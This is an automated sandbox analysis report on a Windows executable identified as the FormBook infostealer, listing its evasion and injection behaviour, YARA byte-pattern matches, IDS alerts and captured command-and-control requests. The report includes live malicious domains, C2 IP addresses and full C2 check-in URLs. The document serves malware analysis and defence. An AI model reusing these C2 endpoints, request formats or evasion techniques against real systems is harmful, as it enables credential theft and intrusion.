Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO# Q919240.exe

Overview

General Information

Sample name:PO# Q919240.exe
Analysis ID:1515409
MD5:1cdbbc595757ea5f6e9393d622d66e10
SHA1:23eee5c85533ade7e463f0ad52bb044292aa4b43
SHA256:1872f51b5d3913490f3936ab41a7388212d4c10e389eb211bc448029380891ce
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO# Q919240.exe (PID: 5976 cmdline: "C:\Users\user\Desktop\PO# Q919240.exe" MD5: 1CDBBC595757EA5F6E9393D622D66E10)
    • svchost.exe (PID: 2704 cmdline: "C:\Users\user\Desktop\PO# Q919240.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fALrZoEgBHis.exe (PID: 3604 cmdline: "C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 2892 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • fALrZoEgBHis.exe (PID: 5424 cmdline: "C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6724 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO# Q919240.exe", CommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", ParentImage: C:\Users\user\Desktop\PO# Q919240.exe, ParentProcessId: 5976, ParentProcessName: PO# Q919240.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", ProcessId: 2704, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO# Q919240.exe", CommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", ParentImage: C:\Users\user\Desktop\PO# Q919240.exe, ParentProcessId: 5976, ParentProcessName: PO# Q919240.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", ProcessId: 2704, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:35:18.761396+020020507451Malware Command and Control Activity Detected192.168.2.749709148.72.152.17480TCP
            2024-09-22T17:35:42.174257+020020507451Malware Command and Control Activity Detected192.168.2.7497143.33.130.19080TCP
            2024-09-22T17:35:56.120065+020020507451Malware Command and Control Activity Detected192.168.2.749718172.191.244.6280TCP
            2024-09-22T17:36:10.054859+020020507451Malware Command and Control Activity Detected192.168.2.749722172.96.191.3980TCP
            2024-09-22T17:36:23.407666+020020507451Malware Command and Control Activity Detected192.168.2.749726217.70.184.5080TCP
            2024-09-22T17:36:37.347253+020020507451Malware Command and Control Activity Detected192.168.2.74973063.250.47.4080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:35:18.761396+020028554651A Network Trojan was detected192.168.2.749709148.72.152.17480TCP
            2024-09-22T17:35:42.174257+020028554651A Network Trojan was detected192.168.2.7497143.33.130.19080TCP
            2024-09-22T17:35:56.120065+020028554651A Network Trojan was detected192.168.2.749718172.191.244.6280TCP
            2024-09-22T17:36:10.054859+020028554651A Network Trojan was detected192.168.2.749722172.96.191.3980TCP
            2024-09-22T17:36:23.407666+020028554651A Network Trojan was detected192.168.2.749726217.70.184.5080TCP
            2024-09-22T17:36:37.347253+020028554651A Network Trojan was detected192.168.2.74973063.250.47.4080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:35:34.564690+020028554641A Network Trojan was detected192.168.2.7497113.33.130.19080TCP
            2024-09-22T17:35:37.085303+020028554641A Network Trojan was detected192.168.2.7497123.33.130.19080TCP
            2024-09-22T17:35:39.575322+020028554641A Network Trojan was detected192.168.2.7497133.33.130.19080TCP
            2024-09-22T17:35:48.517116+020028554641A Network Trojan was detected192.168.2.749715172.191.244.6280TCP
            2024-09-22T17:35:50.996842+020028554641A Network Trojan was detected192.168.2.749716172.191.244.6280TCP
            2024-09-22T17:35:53.575926+020028554641A Network Trojan was detected192.168.2.749717172.191.244.6280TCP
            2024-09-22T17:36:02.435973+020028554641A Network Trojan was detected192.168.2.749719172.96.191.3980TCP
            2024-09-22T17:36:04.991771+020028554641A Network Trojan was detected192.168.2.749720172.96.191.3980TCP
            2024-09-22T17:36:07.507518+020028554641A Network Trojan was detected192.168.2.749721172.96.191.3980TCP
            2024-09-22T17:36:15.772021+020028554641A Network Trojan was detected192.168.2.749723217.70.184.5080TCP
            2024-09-22T17:36:18.306948+020028554641A Network Trojan was detected192.168.2.749724217.70.184.5080TCP
            2024-09-22T17:36:20.860552+020028554641A Network Trojan was detected192.168.2.749725217.70.184.5080TCP
            2024-09-22T17:36:29.259482+020028554641A Network Trojan was detected192.168.2.74972763.250.47.4080TCP
            2024-09-22T17:36:31.833562+020028554641A Network Trojan was detected192.168.2.74972863.250.47.4080TCP
            2024-09-22T17:36:34.393042+020028554641A Network Trojan was detected192.168.2.74972963.250.47.4080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PO# Q919240.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.omexai.info/7xi5/Avira URL Cloud: Label: malware
            Source: https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYAvira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjTAvira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/Avira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjTAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: http://www.omexai.info/7xi5/Virustotal: Detection: 6%Perma Link
            Source: http://www.tekilla.wtf/fpzw/Virustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for submitted file
            Source: PO# Q919240.exeReversingLabs: Detection: 71%
            Source: PO# Q919240.exeVirustotal: Detection: 73%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO# Q919240.exeJoe Sandbox ML: detected
            Source: PO# Q919240.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fALrZoEgBHis.exe, 00000003.00000000.1576220938.00000000005EE000.00000002.00000001.01000000.00000004.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2705527345.00000000005EE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO# Q919240.exe, 00000000.00000003.1456302467.0000000004790000.00000004.00001000.00020000.00000000.sdmp, PO# Q919240.exe, 00000000.00000003.1456163573.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558405527.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556481442.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1665886213.00000000036E0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003BDE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1668169113.0000000003896000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO# Q919240.exe, 00000000.00000003.1456302467.0000000004790000.00000004.00001000.00020000.00000000.sdmp, PO# Q919240.exe, 00000000.00000003.1456163573.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1558405527.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556481442.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000003.1665886213.00000000036E0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003BDE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1668169113.0000000003896000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1633897813.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1665876167.0000000003200000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000003.1606402331.000000000068B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000005.00000002.2710234659.000000000406C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003BBCC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000005.00000002.2710234659.000000000406C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003BBCC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1633897813.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1665876167.0000000003200000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000003.1606402331.000000000068B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0330C2C0 FindFirstFileW,FindNextFileW,FindClose,5_2_0330C2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax5_2_032F9B90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi5_2_03312399
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h5_2_039304DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49713 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49719 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49712 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49725 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49720 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49715 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49714 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49714 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49722 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49717 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49722 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49724 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49727 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49709 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49726 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49709 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49726 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49728 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49721 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49723 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49730 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49730 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49716 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49711 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49718 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49718 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49729 -> 63.250.47.40:80
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 63.250.47.40 63.250.47.40
            Source: Joe Sandbox ViewIP Address: 172.96.191.39 172.96.191.39
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
            Source: Joe Sandbox ViewASN Name: GANDI-ASDomainnameregistrar-httpwwwgandinetFR GANDI-ASDomainnameregistrar-httpwwwgandinetFR
            Source: Joe Sandbox ViewASN Name: AS-30083-GO-DADDY-COM-LLCUS AS-30083-GO-DADDY-COM-LLCUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
